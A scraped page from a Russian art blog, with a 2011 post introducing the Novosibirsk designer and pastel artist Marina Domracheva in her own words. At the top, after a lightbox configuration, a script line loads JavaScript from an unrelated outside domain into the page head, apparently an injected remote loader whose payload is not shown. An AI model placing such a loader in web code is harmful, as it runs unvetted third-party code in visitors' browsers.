, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })
Пользовательский поиск

Добро пожаловать

Советую посмотреть

Страницы

Свежие комментарии

Обмен ссылками

Картины, портреты, критика живописи, Art-дилер




style="display:inline-block;width:120px;height:600px"
data-ad-client="ca-pub-5725625417417931"
data-ad-slot="8961029732">


« | Главная | »

Художник и писатель

Автор: Дмитрий Алмазов | 28 Мар 2011

Домрашева МаринаЗдравствуйте ценители прекрасного. Сегодня хочу представить Вам художника и писателя в одном лице, что не часто встретишь. Это Домрачёва Марина из города Новосибирска. С некоторыми произведениями такими как "Пастель", "Гризайль" и "Картины  Левитана" Вы уже знакомы.

Вот, что она хочет сказать о себе: «Написать несколько слов о себе оказалось труднее, чем на художественные темы. Пожалуй, лучше начать с момента смены деятельности.

Мои попытки реализовать свои творческие идеи начались с составления коллажей, росписи керамики и флористики – вот так пестро.

Однажды, друзья, в организацию которых требовались люди, желающие что-то выдумывать и творить, предложили мне попробовать свои силы в качестве дизайнера, пройдя предварительное обучение. Что, собственно, я и сделала. Хотелось бы выразить им за это благодарность. Это был момент жизни, с которого я начала заниматься тем, чем очень хотела. Мне было предоставлено рабочее место и возможность «изобретать» на заказ в рабочее время, а так же оставаться «сверхурочно» и бесконечно учиться новому для меня делу. Естественно были трудности, поскольку у меня нет художественного образования. Помимо дизайнерских компьютерных программ, мне приходилось постигать и азы изобразительного искусства, впрочем, это я делаю и сейчас.

Два года назад в моей жизни произошло радостное событие, у меня родилась дочь. Теперь я занимаюсь дизайном в режиме «фриланс», когда позволяет время и есть интересные заказы. Именно сейчас у меня возникло желание начать писать пастелью. Хочу поблагодарить за это мою дочь, это она меня вдохновила. Каждый день мы с ней что-то создаем при помощи мела, и часто из зрителя я превращаюсь в соавтора, дочь меня приобщает к своему творческому процессу. Отсюда, я думаю, возникло желание на время отложить перо и мышь и взяться за пастельные мелки".

Если  Вы также хотите стать участником проекта, ознакомьтесь с правилами и напишите мне.

Подписаться на выход постов и публикацию картин можно по RSS подписки.

Темы: Новости | Ваш отзыв »

Отзывы

Перед отправкой формы:
Лаборатория Искусства работает на WordPress